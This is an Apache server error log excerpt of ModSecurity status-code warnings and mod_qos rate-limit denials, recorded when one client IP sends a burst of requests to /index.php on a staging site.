[Tue May 26 19:59:25.401960 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRGDRMqfxdEDkoszu5AAAACg"]
[Tue May 26 19:59:25.471049 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszu-AAAAHw"]
[Tue May 26 19:59:25.475754 2026] [security2:error] [pid 106517:tid 106671] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OjwAAAJo"]
[Tue May 26 19:59:25.492920 2026] [security2:error] [pid 93868:tid 94311] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255cAAAAcQ"]
[Tue May 26 19:59:25.497310 2026] [security2:error] [pid 93868:tid 94309] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255awAAAcI"]
[Tue May 26 19:59:25.501988 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255ZgAAAb4"]
[Tue May 26 19:59:25.515838 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvAgAAAGg"]
[Tue May 26 19:59:25.516994 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvBwAAABk"]
[Tue May 26 19:59:25.524224 2026] [security2:error] [pid 106517:tid 106679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OkgAAAKE"]
[Tue May 26 19:59:25.551932 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuRWDRMqfxdEDkoszvRwAAABU
[Tue May 26 19:59:25.563395 2026] [qos:error] [pid 106517:tid 106741] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuRYZZc2DoU1lPnP1OswAAAN8
[Tue May 26 19:59:25.651585 2026] [qos:error] [pid 93868:tid 94330] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRUqK9k_ZUB2Vp255qAAAAdc
[Tue May 26 19:59:25.655121 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRWDRMqfxdEDkoszvSAAAAG4
[Tue May 26 19:59:25.656308 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRWDRMqfxdEDkoszvSQAAACg
[Tue May 26 19:59:25.658146 2026] [qos:error] [pid 93868:tid 94380] [client 45.148.10.120:35310] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRUqK9k_ZUB2Vp255qQAAAgk
[Tue May 26 19:59:25.659390 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRWDRMqfxdEDkoszvSgAAAFs
[Tue May 26 19:59:25.665197 2026] [qos:error] [pid 93868:tid 94286] [client 45.148.10.120:34954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRUqK9k_ZUB2Vp255qgAAAas
[Tue May 26 19:59:25.666324 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRWDRMqfxdEDkoszvTAAAAHs
[Tue May 26 19:59:25.667482 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRWDRMqfxdEDkoszvTQAAAE8
[Tue May 26 19:59:25.707030 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRWDRMqfxdEDkoszvTgAAAG0
[Tue May 26 19:59:25.750409 2026] [qos:error] [pid 93868:tid 94358] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRUqK9k_ZUB2Vp255rAAAAfM
[Tue May 26 19:59:25.805022 2026] [qos:error] [pid 93868:tid 94382] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRUqK9k_ZUB2Vp255rwAAAgs
[Tue May 26 19:59:25.806555 2026] [qos:error] [pid 93868:tid 94282] [client 45.148.10.120:35310] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRUqK9k_ZUB2Vp255sAAAAac
[Tue May 26 19:59:25.807508 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRWDRMqfxdEDkoszvUQAAAD0
[Tue May 26 19:59:25.808651 2026] [qos:error] [pid 93576:tid 93718] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRWDRMqfxdEDkoszvUwAAAAY
[Tue May 26 19:59:25.813326 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRWDRMqfxdEDkoszvVQAAAEA
[Tue May 26 19:59:25.816926 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRWDRMqfxdEDkoszvVgAAACU
[Tue May 26 19:59:25.817395 2026] [qos:error] [pid 93576:tid 93780] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRWDRMqfxdEDkoszvVwAAAEQ
[Tue May 26 19:59:25.818535 2026] [qos:error] [pid 93868:tid 94316] [client 45.148.10.120:34954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRUqK9k_ZUB2Vp255sQAAAck
[Tue May 26 19:59:25.861902 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRWDRMqfxdEDkoszvWAAAAFY
[Tue May 26 19:59:25.951242 2026] [security2:error] [pid 93868:tid 94362] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255iwAAAfc"]
[Tue May 26 19:59:26.047702 2026] [qos:error] [pid 93868:tid 94314] [client 45.148.10.120:35310] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRkqK9k_ZUB2Vp255tAAAAcc
[Tue May 26 19:59:26.048322 2026] [qos:error] [pid 93868:tid 94329] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRkqK9k_ZUB2Vp255tQAAAdY
[Tue May 26 19:59:26.049507 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRmDRMqfxdEDkoszvWgAAAFk
[Tue May 26 19:59:26.050549 2026] [qos:error] [pid 93868:tid 94313] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRkqK9k_ZUB2Vp255tgAAAcY
[Tue May 26 19:59:26.054320 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRmDRMqfxdEDkoszvXAAAAGY
[Tue May 26 19:59:26.056326 2026] [qos:error] [pid 93576:tid 93805] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRmDRMqfxdEDkoszvXgAAAF0
[Tue May 26 19:59:26.056546 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRmDRMqfxdEDkoszvXQAAABQ
[Tue May 26 19:59:26.057747 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRmDRMqfxdEDkoszvXwAAAFE
[Tue May 26 19:59:26.060120 2026] [qos:error] [pid 93868:tid 94333] [client 45.148.10.120:34954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRkqK9k_ZUB2Vp255twAAAdo
[Tue May 26 19:59:26.060796 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRmDRMqfxdEDkoszvYAAAAAM
[Tue May 26 19:59:26.198084 2026] [qos:error] [pid 93868:tid 94370] [client 45.148.10.120:35310] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRkqK9k_ZUB2Vp255ugAAAf8
[Tue May 26 19:59:26.200078 2026] [qos:error] [pid 93576:tid 93816] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRmDRMqfxdEDkoszvYwAAAGg
[Tue May 26 19:59:26.200794 2026] [qos:error] [pid 93868:tid 94368] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRkqK9k_ZUB2Vp255uwAAAf0
[Tue May 26 19:59:26.203521 2026] [qos:error] [pid 93868:tid 94325] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRkqK9k_ZUB2Vp255vAAAAdI
[Tue May 26 19:59:26.206125 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRmDRMqfxdEDkoszvZAAAAEE
[Tue May 26 19:59:26.207902 2026] [qos:error] [pid 93576:tid 93828] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRmDRMqfxdEDkoszvZQAAAHQ
[Tue May 26 19:59:26.210230 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRmDRMqfxdEDkoszvZgAAAHI
[Tue May 26 19:59:26.210726 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:35006] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRmDRMqfxdEDkoszvZwAAAC0
[Tue May 26 19:59:26.213377 2026] [qos:error] [pid 93868:tid 94272] [client 45.148.10.120:34954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRkqK9k_ZUB2Vp255vQAAAZ0
[Tue May 26 19:59:26.215438 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuRmDRMqfxdEDkoszvaAAAAC4
[Tue May 26 19:59:26.275745 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255aQAAAbw"]
[Tue May 26 19:59:26.276891 2026] [security2:error] [pid 93868:tid 94317] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255YgAAAco"]
[Tue May 26 19:59:26.299590 2026] [security2:error] [pid 106517:tid 106667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OkwAAAJY"]
[Tue May 26 19:59:26.300232 2026] [security2:error] [pid 106517:tid 106676] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OlQAAAJ8"]
[Tue May 26 19:59:26.307540 2026] [security2:error] [pid 93868:tid 94365] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255dgAAAfo"]
[Tue May 26 19:59:26.311422 2026] [security2:error] [pid 93868:tid 94345] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255cgAAAeY"]
[Tue May 26 19:59:26.311496 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvDgAAABY"]
[Tue May 26 19:59:26.311702 2026] [security2:error] [pid 93868:tid 94335] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255bgAAAdw"]
[Tue May 26 19:59:26.325665 2026] [security2:error] [pid 93868:tid 94261] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255dAAAAZI"]
[Tue May 26 19:59:26.335193 2026] [security2:error] [pid 93868:tid 94352] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255egAAAe0"]
[Tue May 26 19:59:26.336034 2026] [security2:error] [pid 106517:tid 106659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OmQAAAI4"]
[Tue May 26 19:59:26.343560 2026] [security2:error] [pid 106517:tid 106682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OlgAAAKQ"]
[Tue May 26 19:59:26.353340 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255eQAAAeI"]
[Tue May 26 19:59:26.355449 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvHQAAADo"]
[Tue May 26 19:59:26.365398 2026] [security2:error] [pid 93868:tid 94374] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255kgAAAgM"]
[Tue May 26 19:59:26.373242 2026] [security2:error] [pid 106517:tid 106683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OlwAAAKU"]
[Tue May 26 19:59:26.377269 2026] [security2:error] [pid 93576:tid 93817] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvLwAAAGk"]
[Tue May 26 19:59:26.401609 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvNQAAAA0"]
[Tue May 26 19:59:26.408703 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvOAAAACI"]
[Tue May 26 19:59:26.414804 2026] [security2:error] [pid 93576:tid 93764] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvLQAAADQ"]
[Tue May 26 19:59:26.415230 2026] [security2:error] [pid 93576:tid 93823] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvKgAAAG8"]
[Tue May 26 19:59:26.420924 2026] [security2:error] [pid 93576:tid 93714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvNAAAAAI"]
[Tue May 26 19:59:26.422762 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvMwAAAGA"]
[Tue May 26 19:59:26.423927 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvOgAAAF8"]
[Tue May 26 19:59:26.429365 2026] [security2:error] [pid 106517:tid 106726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OpgAAANA"]
[Tue May 26 19:59:26.431013 2026] [security2:error] [pid 106517:tid 106687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OpAAAAKk"]
[Tue May 26 19:59:26.437078 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvOwAAAFo"]
[Tue May 26 19:59:26.440288 2026] [security2:error] [pid 93576:tid 93768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRWDRMqfxdEDkoszvMAAAADg"]
[Tue May 26 19:59:26.442570 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255lwAAAb4"]
[Tue May 26 19:59:26.455056 2026] [security2:error] [pid 106517:tid 106679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRYZZc2DoU1lPnP1OqQAAAKE"]
[Tue May 26 19:59:26.455417 2026] [security2:error] [pid 93868:tid 94359] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255mQAAAfQ"]
[Tue May 26 19:59:26.462524 2026] [security2:error] [pid 93868:tid 94357] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255mwAAAfI"]
[Tue May 26 19:59:27.275807 2026] [security2:error] [pid 93868:tid 94378] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255kwAAAgc"]
[Tue May 26 19:59:27.281466 2026] [security2:error] [pid 93868:tid 94297] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255owAAAbY"]
[Tue May 26 19:59:27.286195 2026] [security2:error] [pid 93868:tid 94276] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255nAAAAaE"]
[Tue May 26 19:59:27.295048 2026] [security2:error] [pid 93868:tid 94288] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuRUqK9k_ZUB2Vp255ngAAAa0"]
